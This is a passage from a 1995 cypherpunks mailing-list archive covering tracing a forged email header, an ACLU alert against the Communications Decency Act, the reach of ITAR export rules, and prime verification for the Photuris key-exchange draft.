Message-ID: <199511070404.XAA04542@homeport.org>


You need to send the entire headers, including such things as recieved
lines.  Looking over those lines carefully will probably provide some
clues.

eg:
>From owner-cypherpunks at toad.com  Sun Sep 24 20:14:32 1995
>Return-Path: owner-cypherpunks at toad.com
>Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
>homeport.org (8.6.9/8.6.9) with ESMTP id UAA18842 for
><adam at homeport.org>; Sun, 24 Sep 1995 20:14:30 -0400
>Received: from toad.com by relay3.UU.NET with SMTP 
>        id QQziqi14036; Sun, 24 Sep 1995 20:10:07 -0400
>Received: by toad.com id AA02191; Sun, 24 Sep 95 17:05:32 PDT
>Received: from crypto.com by toad.com id AA02182; Sun, 24 Sep 95
>17:05:26 PDT
>Received: from tpc.crypto.com by crypto.com Sun, 24 Sep 1995 20:16:16
>-0400
>Message-Id: <199509250016.UAA19204 at crypto.com>


| So I got this message.  How would someone identify the sender of this
| message?  I'm writing an article on anonymity, with some discussion of
| remailers, and want to argue that forging already permits people to raise
| the costs of tracing significantly, anonymous remailers or no.  
| 
| Lee
| 
| >From: freeh at fbi.gov
| >Date: Tue, 24 Oct 95 16:07:08 -0400
| >Apparently-To: tien at well.sf.ca.us
| >X-UIDL: 814570964.056
| >
| >> How difficult is it to forge headers?  How difficult is it to trace a
| >> message to the actual sender if the header is forged?
| >
| >Not very difficult at all (to forge, that is).  This is a quick and dirty
| >example that should be somewhat traceable.  If you want pointers on how to
| >trace it, post the whole thing, including headers, to cypherpunks.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From ACLUNATL at aol.com  Tue Nov  7 06:40:29 1995
From: ACLUNATL at aol.com (ACLUNATL at aol.com)
Date: Tue, 7 Nov 1995 22:40:29 +0800
Subject: Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <951106134311_99292624@mail04.mail.aol.com>


Here are the advocacy instructions for individuals opposed to the Federal
Online Indecency Legislation that we promised last week.

========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

	Update: -Latest News:
		 The Christian Coalition is pushing Congress to censor
		 the net more heavily than even Sen. J.J. Exon ever imagined.
	 	 There is the very real possibility that they may succeed.

		 You should be very worried.  We are.

		-What You Can Do Now:
	 	 Follow the directions below and call House Speaker
		 Gingrich and Senate Leader Dole.  Implore them
		 to allow parents to make choices for their children, instead
		 of government censors.

		 Volunteer to join the fight by helping organize in your
		 home town.  

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
			   Nov 2, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
		REDISTRIBUTE ONLY UNTIL December 1, 1995
	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	The letter from Ed Meese and the Christian Right
	Chronology of the CDA
        For More Information
        List Of Participating Organizations

________________________________________________________________________
THE LATEST NEWS

Since the very first day that Senator J.J. Exon (D-NE) proposed censorship
legislation for the Internet, the Christian Right has pushed for the most
restrictive regulations they could think of.

The Religious Right (which does not necessarily speak for all religious
people concerned with this issue) recently tipped their hand in a letter
to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting
a new and more restrictive net censorship proposal.

There are essentially three new dangerous elements of their campaign
to shut down cyberspace:


INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR
 EXPRESSION ONLINE
The Religious Right has proposed to hold anyone who provides access to the
Internet or other interactive media, including online services providers,
ISP's, BBS's, Libraries, and Schools, criminally liable for all speech
carried on the network.

In order to avoid liability under this provision, service providers would be
forced to monitor user's electronic communications to be assured that
no "indecent" material is transmitted across their networks.

This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act,
or any other net censorship legislation currently in Congress.

In their letter to Congress, the Religious Right says:

	[Providers] would simply be required to avoid KNOWING violations of
	the law. [emphasis added]

However, the "knowing" standard is vague enough that the mere knowledge
that such material exists could be sufficient to trigger criminal liability.
A single complaint or even a news report could force a service provider to
take down a web page, remove posts to chat rooms or other discussion
forums, or shut down listservs in order to avoid going to jail and facing
huge fines.


A STANDARD FOR INDECENCY
The proposals pushed by the Christian Coalition relies on the
unconstitutional "indecency standard".  Like the Exon Communications
Decency Act, the Christian Coalition seeks to regulate all indecent
speech online.

Indecency is a broad category that includes everything from George Carlin's
"seven dirty words" to such classic novels and "The Catcher in the Rye" and
"Lady Chatterly's Lover". 

The Supreme Court has ruled that restrictions on indecent speech are 
Constitutional only if they rely on the "least restrictive means".  Broad
indecency restrictions on interactive media do not satisfy the "least
restrictive means" test, because interactive media allows users and
parents tremendous control over the information they receive.

Any legislation which attempts to apply an indecency restriction to the 
Internet is unconstitutional on its face.

The Christian Coalition's proposal that relies on an indecency
restriction contemplates dumbing down every conversation, web page,
newsgroup, and mailing list on the Internet to the level of what is
not offensive to children.

What kind of discussions between adults are possible in an arena
where everything has been reduced to the level of the Lion King?


UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC
The Christian Coalition would give the FCC broad jurisdiction over
cyberspace.  It would allow the FCC jurisdiction over your online
speech, and over the design Internet software, such as web browsers and
filtering programs that parents can use to control their children's
access to the Internet.

The Internet has developed from a government project to a market-driven
economic boom for thousands of businesses.  Giving the FCC authority over
this medium would significantly hinder the growth of this new industry.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. The proposals from the Religious Right will literally destroy online
   speech as we know it.  The odds of stopping this are not certain.

   There is a very real chance that this legislation will pass, and
   we will experience a period of uncertainty and chilling of speech
   while an appropriate test case attempts to reach the Supreme Court
   (should it even get there!)

   The Religious Right has a strong grass-roots network.  We need to
   counter their energy and ensure cyberspace is not lost due to them.

   IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader
   Dole (R-KS) and urge them to oppose the Christian Coalition's
   proposal.

   Name, Address, and Party     Phone            Fax
   ========================     ==============   ==============
   R GA Gingrich, Newt 		1-202-225-4501   1-202-225-4656
   R KS Dole, Robert            1-202-224-6521   1-202-224-8952

   If you're at a loss for words, try one of the following:

	Please oppose the recent proposal from the Religious Right to
	censor the Internet.  The only effective way to address children's
	access to the Internet is through parental control tools outlined
	by the Cox/White/Wyden approach.
   or
	As a religious person and a parent, I oppose the Religious Right's
	attempts to censor the Internet.  I am the best person to monitor
 	my child's access to the Internet using parental control tools
	as outlined in the Cox/White/Wyden approach.
  
2. Join the online fight by becoming a volunteer for your district!

   Check to see if you're legislator is in the list below.  If they are
   not, consult the free ZIPPER service that matches Zip Codes to
   Congressional districts with about 85% accuracy at:

	URL:http://www.stardot.com/~lukeseem/zip.html

   The conference committee legislators are:
   House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA),
	Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN),
	Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX),
	Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA),
	Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL),
	Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA),
	Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL),
	Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL),
	White (R-WA)
   Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA),
	Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ),
	Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK)

   If your legislator is on the conference committee, you have a chance
   to influence their vote on this issue with your power as a constituent.
   Volunteer to help educate your legislator by sending mail to
   volunteer at vtw.org.  A coalition volunteer will be in touch with you.

   You can starting working to help spread the word in your district by
   sending this letter to five friends.  Ask them to call Dole and Gingrich
   as well.

3. The People for the American Way (PFAW) and the American Civil Liberties
   Union are organizing a letter from ORGANIZATIONS to the Conference
   Committee to oppose the censorship provisions.

   If you are a representative of an organization that would like to
   signon to this letter, you should contact jlesser at pfaw.org IMMEDIATELY. 

4. We can't suggest relaxing at this point.  The stakes are too high, and
   the risk is too great.  Everything now hangs in the balance.

________________________________________________________________________
THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT

October 16, 1995
 
The Honorable Thomas J. Bliley, Jr.  Chairman
Committee on Commerce
United States House of Representatives
Washington, DC 20515
 
The Honorable Larry Pressler, Chairman
Committee on Commerce, Science, and Transportation
United States Senate
Washington, DC 20510
 
Re: Computer Pornography Provisions in Telecommunications Bill
 
Dear Mr. Chairmen:
 
We are writing to urge the conference committee seeking to reconcile the
telecommunications bills passed by the House and Senate include in the
final bill the strongest possible criminal law provisions to address the
growing and immediate problem of computer pornography without any
exemptions, defenses, or political favors of any kind accorded to those
who knowingly participate in the distribution of obscenity to anyone or
indecency to children. While there is no perfect solution to the problem
of computer pornography, Congress could not hope to solve this problem by
holding liable only some who are responsible for the problem.
 
The recent Justice Department prosecution project targeting those who
violated federal child pornography law using America On-Line is
instructive in this regard. More than ninety individuals were targeted for
prosecution although many others, perhaps as many as 3,000 according to
one press report, were originally targeted by the Department of Justice as
potential violators of child pornography laws. Apparently due to a
shortage of investigative and prosecutorial resources, the project was
limited. Since there are insufficient resources to investigate and
prosecute but a fraction of those that are trafficking in child
pornography by computer, then there will likely be even fewer resources
available to investigate and prosecute those involved in obscenity and
indecency.
 
Thousands of individuals both in this country and abroad are regularly
placing obscenity and indecency on the Internet. It is not possible to
make anything more than a dent in the serious problem of computer
pornography if Congress is willing to hold liable only those who place
such material on the Internet while at the same time giving legal
exemptions or defenses to service or access providers who profit from and
are instrumental to the distribution of such material. The Justice
Department normally targest the major offenders of laws. In obscenity
cases prosecuted to date, it has targeted large companies which have been
responsible for the nationwide distribution of obscenity and who have made
large profits by violating federal laws. Prosecution of such companies has
made a substantial impact in curbing the distribution of obscenity, with
many such offenders going out of business altogether. So too will
prosecution of access providers which _knowingly_ traffic in obscenity
have a substantial impact, a far greater impact than just the prosecution
of a person who places one or a few prohibited images on the Internet.
Such a person could not traffic in pornography without the aid or
facilitation of the service or access providers. Indeed, if Congress
includes provisions protecting access or service providers in whatever
bill is finally passed, it is likely that most in this country who are
trafficking in indecency to children or obscenity would continue to do so
since the threat of prosecution would be minuscule, given the numbers of
those currently involved in this activity. It is also likely that those
outside our country who are engaged in these activities would continue to
do so since it would be nearly impossible to extradite them to the United
States for prosecution. Thus, unless all who knowingly participate in such
matters are subject to the law, the Internet will remain the same and
Congress will have failed in its responsibilities to the children and
families of America.
 
Federal law has traditionally assigned equal liability both for those who
commit a crime and those who aid and abet a crime. See Title 18 U.S.C.
Code Section 2: "(a) whoever [sic] commits an offense against the United
States or aids, abets, councils [sic], commands, induces, or procures its
commission, is punishable as a principle [sic]." Service or access
providers who knowingly participate in the distribution of indecency to
children or in obscenity to anyone are aiders and abettors in the
commission of those crimes and thus should have liability under any law
Congress passes. Current federal law on child pornography provides no no
exemption or defense for access providers. Thus, the child pornography law
provides a strong deterrent against trafficking in child pornography for
those who would otherwise knowingly participate in its distribution by
computer whether pedophile or access provider.
 
The changes in law which we support would not hold an access provider
criminally liable for all illegal pornography on the Internet which their
services may be used to obtain. Nor would it require that access providers
check all communications to ensure that no violations of the law are
occurring. They would simply be required to avoid knowing violations of
the law. This is an obligation imposed on all citizens. Technology exists
today for access providers, through a simple process, to target or flag
and remove files containing objectionable material.
 
We support the House-passed language insofar as it addresses obscenity by
amendment Title 18, Sections 1462, 1465, and 1467 of the United States
Code. The provision restricting transmission of indecency in the House-passed
bill, an amendment to Section 1465, is inadequate, and we urge that it be
substantially revised.
 
Attached is the specific language we support which includes the House
passed language on obscenity and includes revisions on both the House
passed language on indecency, which would amend Title 18 and the
Senate-passed language on indecency, which would amend Title 47. The
combination of these provisions, we believe, would provide effective laws
to curb obscenity and indecency on the Internet by establishing that all
who knowingly participate in the distribution or facilitation of obscenity
to anyone or indecency to children would be subject to the law.
 
Thank you for your concern and attention to this matter.
 
 
[signed]
 
Edwin Meese III
 
Ralph Reed
Christian Coalition
 
Donald E. Wildmon
American Family Association
 
Alan Sears, Former Executive Director
Atty General's Commission on Pornography
 
Phyllis Shafly
Eagle Forum
 
Beverly LaHaye
Concerned Women for America
 
Reverend Louis P. Sheldon
Traditional Values Coalition
 
Jay Sekulow
American Center for Law and Justice
 
Paul Weyrich
Free Congress Foundation
 
Paul McGeady
Morality in Media
 
Len Munsil
National Family Legal Foundation
 
Robert Peters
Morality in Media
 
Kenneth Sukhia
Former United States Attorney, N.D., FL
Former Chairman, Atty General's Advisory Committee
Subcommittee on Child Exploitation and Obscenity


--------------------------

 
Section 1465 of Title 18, United States Code, is amended to punish
distribution by computer of indecent material to minors by adding at the
end the following:
 
Whoever knowingly communicates, transmits, or makes available for
communication or transmission, in or effecting interstate or foreign
commerce an indecent communication by computer to any person the
communicator or transmitter believes has not attained the age of 18 years
of age, knowing that such communication will be obtained by a person
believed to be under 18 years of age, shall be fined under this title or
imprisoned not more than five years, or both.
 
TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF
TELECOMMUNICATIONS FACILITY
 
SEC. 401. SHORT TITLE
         This title may be cited as the "Communications Decency Act of
1995".
 
Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER
THE COMMUNICATIONS ACT OF 1934
 
Section 223 (47 U.S.C. 223) is amended --
   (1) by striking subsection (a) and inserting in lieu of [sic]:
 ``(a) Whoever--
    ``(1) in the District of Columbia or in interstate or foreign
communications --
        ``(A) by means of telecommunications device knowingly--
          ``(i) makes, creates, or solicits, and
          ``(ii) initiates the transmission of,
     any comment, request, suggestion, proposal, image, or other
     communication which is obscene, lewd, lascivious, filthy, or
     indecent, with intent to annoy, abuse, threaten, or harass
     another person;
         ``(B) makes a telephone call or utilizes a
     telecommunications device, whether or not conversation or
     communication ensues, without disclosing his identity and
     with intent to annoy, abuse, threaten, or harass any person
     at the called number or who receives the communication;
         ``(C) makes or causes the telephone of another repeatedly
     or continuously to ring, with intent to harass any person at
     the called number; or
         ``(D) makes repeated telephone calls or repeatedly
     initiates communication with a telecommunications device,
     during which conversation or communication ensues, solely to
     harass any person at the called number or who receives the
     communication;
      ``(2) knowingly permits any telecommunications facility
     under his control to be used for any activity prohibited by
     paragraph (1) with the intent that it be used for
     such activity,
 
  shall be fined not more than $100,000 or imprisoned not more
  than two years, or both.''; and
 
   (2) by adding at the end the following new subsections:
 
 ``(d) Whoever--
       ``(1) knowingly within the United States or in foreign
     communications with the United States by means of
     telecommunications device makes or makes available any
     indecent communication in any form including any comment,
     request, suggestion, proposal, or image, to any person under
     18 years of age regardless of whether the
     maker of such communication placed the call or initiated the
     communication; or
       ``(2) knowingly permits any telecommunications facility
     under such person's control to be used for an activity
     prohibited by paragraph (1) with the intent that it be
     used for such activity,
  shall be fined not more than $100,000 or imprisoned not more
  than two years or both.
      ``(e) Defenses to subsections (a) and (d), restrictions on 
     access, judicial remedies respecting restrictions for
     persons providing information services and
     access to information services--
      "(1) It is a defense to prosecution that a person has complied
     with regulations designed to restrict access to indecent
     communications to those 18 years old or older as enacted by the
     Federal Communications Commission which shall prepare final 
     regulations within 120 days of the passage of this bill. Until
     such regulations become effective, it is a defense to
     prosecution that the person has blocked or restricted access
     to indecent communications to any person under 18 years
     of age through the use of verified credit card, adult access
     code, or adult personal identification number (PIN).   
     Nothing in this subsection shall be construed to treat
     enhanced information services as common carriage."
       "(2) No cause of action may be brought in any
     court or any administrative agency against any person on account
     of any activity which is not in violation of any law punishable
     by criminal or civil penalty, which activity the person has taken in
     good faith to implement a defense authorized under this section or
     otherwise to restrict or prevent the transmission of, or access to,
     a communication specified in this section.
     (f) Nothing in this subsection shall preclude any State or
     local government from enacting and enforcing laws and regulations
     which do not result in the imposition of inconsistent obligations on
     the provision of interstate services.  Nothing in this subsection
     shall preclude any State or local government from governing conduct
     not covered by subsection (d)(2)."
     (g) Nothing in subsection (a), (d), or (e) or in the
     defenses to prosecution under (e) shall be construed
     to affect or limit the application or enforcement of any other
     Federal law.
     (h) The use of the term 'telecommunications device' in this
     section shall not impose new obligations on (one-way) broadcast
     radio or (one-way) broadcast television operators licensed by the
     Commission or (one-way) cable services registered with the
     Federal Communications Commission and covered by obscenity and
     indecency provisions elsewhere in this Act.
 
Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.
 
        Section 639 (47 U.S.C. 559) is amended by striking "10,000" and
inserting "$100,000"
 
Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.
 
        Section 1466 of Title 18, United States Code, is amended by
striking out "$10,000" and inserting "$100,000".
 
Sec. 405 SEPARABILITY
 
        "(a) If any provision of this Title, including amendments to this
Title of [sic] the application thereof to any person or circumstance is
held invalid, the remainder of this Title and the application of such
provision to other persons or circumstances shall not be affected
thereby."

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Sep 26, '95	Sen. Russ Feingold urges committee members to drop
		Managers Amendment and the CDA from the Telecommunications
		Deregulation bill
Aug  4, '95	House passes HR1555 which goes into conference with S652.
Aug  4, '95	House votes to attach Managers Amendment (which contains
		new criminal penalties for speech online) to
		Telecommunications Reform bill (HR1555).
Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
	 	Reform bill (HR1555).
Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
		Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary
committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.vtw.org/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
	URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw at vtw.org (put "send alert" in the subject line for the latest
		alert, or "send cdafaq" for the CDA FAQ)
        cda-info at cdt.org (General CDA information)
        cda-stat at cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.

American Civil Liberties Union * American Communication Association *
American Council for the Arts * Arts & Technology Society * Association
of Alternative Newsweeklies * biancaTroll productions * Boston
Coalition for Freedom of Expression * Californians Against Censorship
Together * Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet *Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Inland
Book Company * Inner Circle Technologies, Inc. * Inst. for Global
Communications * Internet On-Ramp, Inc. * Internet Users Consortium *
Joint Artists' and Music Promotions Political Action Committee * The
Libertarian Party * Marijuana Policy Project * Metropolitan Data
Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle
Greenway * National Campaign for Freedom of Expression * National
Coalition Against Censorship * National Gay and Lesbian Task Force *
National Public Telecomputing Network * National Writers Union * Oregon
Coast RISC * Panix Public Access Internet * People for the American Way
* Republican Liberty Caucus * Rock Out Censorship * Society for
Electronic Access * The Thing International BBS Network * The WELL *
Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================





From acceso2 at diatel.upm.es  Tue Nov  7 06:43:47 1995
From: acceso2 at diatel.upm.es (Usuario Acceso2)
Date: Tue, 7 Nov 1995 22:43:47 +0800
Subject: Wich pgp is stronger?
Message-ID: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>


Hi C'punks:

Wich pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?

What are exactly the differences between them?

Thanks, Jaime






From junger at pdj2-ra.F-REMOTE.CWRU.Edu  Tue Nov  7 07:07:20 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 23:07:20 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <m0tCpU8-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>


Oliver Huf writes:

: 
: 
: On Tue, 7 Nov 1995, Peter D. Junger wrote:
: 
: > >From Section 120.17 of the ITAR which provides:
: > 
: >  _Export_ means:
: >  . . . .
: >  (4) Disclosing (including oral or visual disclosure) or transfering
: >  technical data to a foreign person, whether in the United States or
: >  abroad . . . .
: 
: The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
: or persons in the U.S.!

Go tell that to General Noriega.  I don't know what definition you are
talking about, but it is not one recognized by the American Courts.

: I think it's a common mistake of many Americans that they believe
: creating law means creating law for the whole world!

: > Go read the section that I quoted again.  Where is there an exception
: > for foreign persons who happen to be abroad?  
 
: It's inherent. You simply can't apply US-law to non-US-citizens outside
: the U.S.!  

The American courts will apply American laws to non-US-citizens who
violate American laws outside the United States, if they can catch
them.  The fact that they may be in the United States because they
were kidnapped or because they were captured outside the United States
in an agressive war that quite clearly violated international law
won't stop them for a moment.  And lord help the foreigner who has 
violated US law outside the US and then tries to immigrate to the
United States.

And the United States is not alone in this.  Look what Israel did to
Eichman.

And didn't Denmark just allow Germany to extradite an American citizen
for nasty things that he wrote and said in the United States?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger at pdj2-ra.f-remote.cwru.edu    junger at samsara.law.cwru.edu





From asgaard at sos.sll.se  Tue Nov  7 07:30:52 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Tue, 7 Nov 1995 23:30:52 +0800
Subject: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <Pine.HPP.3.91.951107154858.9847A-100000@cor.sos.sll.se>


On Tue, 7 Nov 1995, Oliver Huf wrote:

> It's inherent. You simply can't apply US-law to non-US-citizens outside
> the U.S.!  

Well, also (?) the Exxon bill tries to do just that.

If you put up 'indecent' material at your .de site that persons in the
US can ftp or browse or whatever, and the Exxon bill passes, you can
be sentenced to (at least) 2 years jail in the US. Presumably, since
they don't think you are as important as the infamous ex Panama
president, they won't come and get you, but might meet you at the
airport if you ever plan to visit the US. (They will not try to
get you sentenced in a German court since you haven't committed any
crime in Germany, and the German Government will probably not
extradite you - I'm not familiar with German extradition laws, though.)

With only one military superpower left we can expect it's jurisdiction
to expand as it seems fit.

Mats






From bsimpson at morningstar.com  Tue Nov  7 07:31:52 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Tue, 7 Nov 1995 23:31:52 +0800
Subject: Photuris Primality verification needed
Message-ID: <1999.bsimpson@morningstar.com>


> From: "Brian A. LaMacchia" <bal at martigny.ai.mit.edu>
>    > Recently, someone asked for a smaller prime of only 512-bits for speed.
>    > This is more than enough for the strength of keys needed for DES, 3DES,
>    > MD5 and SHA.  Perhaps this would be easier to have more complete and
>    > robust verification as well.
>
> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits.  In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite.  [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]
>
Thanks.  I have added the [from Schneier] estimate

   e ** ((ln p)**1/2 * (ln (ln p))**1/2)

and number field sieve estimate

   e ** ((ln p)**1/3 * (ln (ln p))**2/3)

to the Photuris draft, with a small amount of explanation.

Hilarie Orman posted that 512-bits only gives an order of 56-bits
strength, 1024-bits yeilds 80-bits strength, and 2048 yields 112-bits
strength.  I do not have the facilities to verify her numbers.

As most of us agree that 56-bits is not enough (DES), the 512-bit prime
seems a waste of time and a tempting target.  I'd like to drop it, but
Phil is inclined to keep it with a disclaimer.

Bill.Simpson at um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2





From bsimpson at morningstar.com  Tue Nov  7 07:33:13 1995
From: bsimpson at morningstar.com (William Allen Simpson)
Date: Tue, 7 Nov 1995 23:33:13 +0800
Subject: Photuris Primality verification needed
Message-ID: <1997.bsimpson@morningstar.com>


I wish to roundly thank all those that responded to our need for
verification.  We had several excellent responses.  The primes have now
been better verified using Miller-Rabin with different platforms, and
with separately coded math libraries.  More exhaustive testing is
ongoing.

Thanks are due to Wei Dai and Frank A Stevenson, as well as independent
math libraries by Rich Schroeppel and Eric Young.

Bill.Simpson at um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2





From froomkin at law.miami.edu  Tue Nov  7 07:46:19 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Tue, 7 Nov 1995 23:46:19 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107102406.21752D-100000@viper.law.miami.edu>


I am delighted to discover that there is a person in this world who reads 
the ITAR more broadly than I do.  I can see how the ITAR could be read to 
reach a Frenchman who sends crypto via email to a German that happens, 
through no fault of his own, to be routed via New York; we might have to 
talk about whether the scienter requirment would mean that M. Frenchman 
knew or should have known about the routing.  [NB "could be read" does 
not equal "should be read".]

Not even I, however, would imagine that any court anywhere, could read 
the ITAR or the legislation authorizing it (which is more to the point) 
as reaching two foreigners talking abroad, neither of whom is a US person.

Not only does the US lack the jursidction to make such a rule, it has 
never sought to make such a rule in any context I am aware of (no, 
foreign wars don't count).  Not even in anti-trust or securities, 
where the extraterritorial jurisdictional assertions are premised on the 
effects of the foreign act to the US market...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From jya at pipeline.com  Tue Nov  7 08:02:39 1995
From: jya at pipeline.com (John Young)
Date: Wed, 8 Nov 1995 00:02:39 +0800
Subject: NOT_nok
Message-ID: <199511071547.KAA25224@pipe2.nyc.pipeline.com>


   11-7-95. W$J, Page One lead:

   "The 'Intranet'. Internet Software Poses Big Threat to
   Notes, IBM's Stake in Lotus."

      Hundreds of firms are achieving similar groupware
      linkups with simpler, cheaper systems on the World Wide
      Web. Dubbed "Intranets," these private networks combine
      text, graphics and even video to distribute news, answer
      employee questions, update personnel records and connect
      far-flung workers. The Intranets link a total of about
      15 million workers. These private networks are far
      different from what most Internet fans see -- the public
      "home pages." These setups reside on company-controlled
      servers shielded from the public Web by a security
      "firewall."

      The Web has an "open" design that all programming
      developers can use in common, as opposed to the "closed"
      and proprietary designs of Lotus Notes, Novell's
      Groupwise and Microsoft's Exchange. That lets Intranets
      accept traffic from incompampatible computers more
      readily, making it easier for customers and suppliers to
      tap in, and for users to draw data from old mainframes
      and minicomputers.

   NOT_nok  (10 kb)













From perry at piermont.com  Tue Nov  7 08:13:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 8 Nov 1995 00:13:07 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511070433.AA11349@zorch.w3.org>
Message-ID: <199511071551.KAA16700@jekyll.piermont.com>



hallam at w3.org writes:
> 
> >Were that the case, citizens couldn't sue to have provisions impacting
> >them enforced, but the fact of the matter is that they can.
> 
> Various treaties provide that various privilleges will be granted to
> various citizens of the countries concerned. Do the treaties grant
> such privilleges in this case? Just because there is a treaty on
> nuclear disarmament between the US and the USSR does not mean that
> you as a private citizen can press for enforcement through the
> courts if you think that the USSR is not performing.

No, but treaties permitting citizens of Canada to work in the U.S. are
enforceable in U.S. courts, and other similar treaties that have
